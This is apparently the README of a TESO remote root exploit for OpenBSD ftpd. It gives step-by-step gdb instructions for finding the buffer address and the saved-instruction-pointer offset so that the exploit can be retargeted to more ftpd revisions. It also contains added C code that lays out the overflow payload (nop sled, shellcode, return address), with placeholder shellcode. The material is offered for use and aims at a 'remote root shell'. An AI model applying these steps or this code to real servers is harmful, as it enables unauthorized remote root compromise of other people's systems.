TESO REMOTE OPENBSD FTPD EXPLOIT                   <caddis@el8.org>
===================================================================

UPDATING EXPLOIT
----------------

The target vectors supplied with this exploit cover only the OpenBSD
2.7 and 2.8 BASE branches. There are quite a few revisions of the
vulnerable ftpd.c code, starting at branch OPENBSD_2_4_BASE
(ftpd.c 1.49) and running up to branch OPENBSD_2_8 (ftpd.c 1.79).
I don't have time to collect target vectors for each of these ftpd's,
so instead I'm supplying general update instructions. Please don't
email me reporting that the exploit does not work until you have read
and followed the instructions below.

In order to add a new revision some ground work is required. First
you will need an account on the target system. Download the source
code for the /usr/libexec/ftpd target revision if it is not already
available on the target host. Compile the ftpd source code, making
sure the binary is not stripped of symbols (gdb needs them to find
replydirname). Depending on the revision, you may also need the
source code for /bin/ls and /usr/bin/login.

Add a dummy target vector to the targets array, like the following
(the address and offset are placeholders that will be replaced
with the values found below):
{ "TEST", 0x73507350, 800 }

Before compiling the exploit, edit the makefile and uncomment 
the -DDEBUG option. Run the exploit against the target host and
wait for the message "Ok, waiting, attach now.".

At this point you must attach gdb to the ftpd process on the target
host. Obtain the pid of the ftpd process which the exploit is 
connected to and run:

gdb /usr/src/libexec/ftpd/ftpd pid_of_process

Once gdb is attached we need to disassemble replydirname so we can
find the location in the text segment where replydirname restores
the old stack frame and returns. Look for the leave and ret
instructions at the end of the function.

(gdb) disassemble replydirname
Dump of assembler code for function replydirname:
....
0x59ef <replydirname+91>:       leave
0x59f0 <replydirname+92>:       ret
....
End of assembler dump.

Now we need to set a break point on the leave instruction and 
resume process execution.

(gdb) b *0x59ef
Breakpoint 1 at 0x59ef: file ftpd.c, line 1971.
(gdb) c
Continuing.

Once the break point is reached we need to locate the address where
our evil directory starts. replydirname takes the directory name as
its first argument, which on i386 sits at $ebp+8 while the frame is
still intact, so dump that slot to obtain the address.

(gdb) x/x $ebp + 8
0xdfbfcfb0:     0xdfbfcfd8

Ok, now that we know where the directory starts, we need the offset
from this address to the position in memory where our new saved
address must be written. Step over the leave instruction so that the
frame is torn down.

(gdb) ni

Now that %ebp has been reloaded from the stack, the slot holding the
saved instruction pointer the exploit overwrites is at $ebp+4. Dump
it with:

(gdb) x/x $ebp + 4
0xdfbfd304:     0x54545454

The value shown there (0x54545454, i.e. "TTTT") should be bytes of
the directory name the exploit sent; that confirms the slot lies
inside our buffer. We now have both addresses required to calculate
the saved ip offset from the directory buffer.

(gdb) p (0xdfbfd304 - 0xdfbfcfd8)
$1 = 812

It's now time to update the exploit vector.
{ "TEST", 0xdfbfcfd8, 812 }

Recompile the exploit and run it against the target system. If
all goes well you should have a remote root shell :)
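The two numbers in a target vector are all the exploit needs to lay
out the directory name, and it is worth seeing that layout spelled
out: the saved ip slot sits ip_offset bytes into the name and receives
dir_addr, which points back to the start of the name where the payload
waits. The C below is an added illustration written for this README,
not code from the exploit's main.c. The layout (nop sled, shellcode,
address), the forbidden-byte rule and the names struct target,
saved_ip_offset, addr_usable and build_dirname are assumptions made
for the example, and the two-byte "shellcode" is a constructed
placeholder, not a working payload.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Target vector as used in the walkthrough above: the address where the
 * directory name lands on ftpd's stack, and the distance from that address
 * to the saved instruction pointer slot that the overflow reaches.
 * (Field names are assumptions for this example.) */
struct target {
    const char *name;
    uint32_t    dir_addr;   /* x/x $ebp+8 at the leave breakpoint */
    uint32_t    ip_offset;  /* (address of saved ip) - dir_addr    */
};

/* Distance from the directory buffer to the saved ip slot, the value
 * computed by "p (0xdfbfd304 - 0xdfbfcfd8)" in the walkthrough. */
uint32_t saved_ip_offset(uint32_t dir_addr, uint32_t saved_ip_addr)
{
    return saved_ip_addr - dir_addr;
}

/* Bytes that cannot survive the trip into ftpd as part of a directory name:
 * NUL ends the C string, '/' splits path components, CR/LF end the FTP
 * command line. (Assumed constraints; main.c may impose others.) */
static int byte_ok(uint8_t b)
{
    return b != 0x00 && b != '/' && b != '\r' && b != '\n';
}

/* An address is usable as the new saved ip only if none of its four
 * little-endian bytes is a forbidden byte. */
int addr_usable(uint32_t a)
{
    for (int i = 0; i < 4; i++)
        if (!byte_ok((uint8_t)(a >> (8 * i))))
            return 0;
    return 1;
}

/* Lay out the directory name for a target: a nop sled padded so that the
 * shellcode ends exactly at ip_offset, then dir_addr in little-endian
 * (pointing back to the start of the name, i.e. into the sled), then a
 * terminating NUL. Returns the name length (without NUL), or -1 if the
 * vector or shellcode cannot be expressed as a directory name. */
int build_dirname(const struct target *t, const uint8_t *sc, size_t sclen,
                  uint8_t *out, size_t outlen)
{
    if (!addr_usable(t->dir_addr) || sclen > t->ip_offset)
        return -1;
    if (outlen < (size_t)t->ip_offset + 4 + 1)
        return -1;

    size_t pad = t->ip_offset - sclen;
    memset(out, 0x90, pad);                 /* i386 nop sled */
    memcpy(out + pad, sc, sclen);
    for (int i = 0; i < 4; i++)
        out[t->ip_offset + i] = (uint8_t)(t->dir_addr >> (8 * i));
    out[t->ip_offset + 4] = 0x00;

    /* The shellcode itself may contain a forbidden byte; refuse rather
     * than send a name that ftpd would truncate or split. */
    for (size_t i = 0; i < (size_t)t->ip_offset + 4; i++)
        if (!byte_ok(out[i]))
            return -1;
    return (int)(t->ip_offset + 4);
}

int main(void)
{
    /* The vector derived in the walkthrough. */
    struct target t = { "TEST", 0xdfbfcfd8, 812 };
    /* Constructed placeholder, not real shellcode: two int3 breakpoints. */
    const uint8_t sc[] = { 0xcc, 0xcc };
    uint8_t name[1024];

    int len = build_dirname(&t, sc, sizeof sc, name, sizeof name);
    if (len < 0) {
        fprintf(stderr, "vector %s is not expressible as a directory name\n",
                t.name);
        return 1;
    }
    printf("%s: directory name of %d bytes, saved ip at +%u -> 0x%08x\n",
           t.name, len, t.ip_offset, t.dir_addr);
    return 0;
}
```

Run this against a candidate vector before trying it on the target: a
-1 from build_dirname means the address contains a NUL, '/', CR or LF
byte and can never be sent as a directory name, so you need a different
vector (for instance a higher address inside the buffer), not another
attempt.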


MODS
----

See main.c for tunables. You can add directory hints and change
the default username, password and port. 

THANKS
------

Big thanks goes out to the following people in no particular order 
for providing me with shells to work with:

arch, interrupt, k2, howler, lst, skyper, hendy, sl0ppy, peltier, 
kraze, dedmunk and hostile.

Also greetz and thanks to all the members of #crocodile_wrestling.
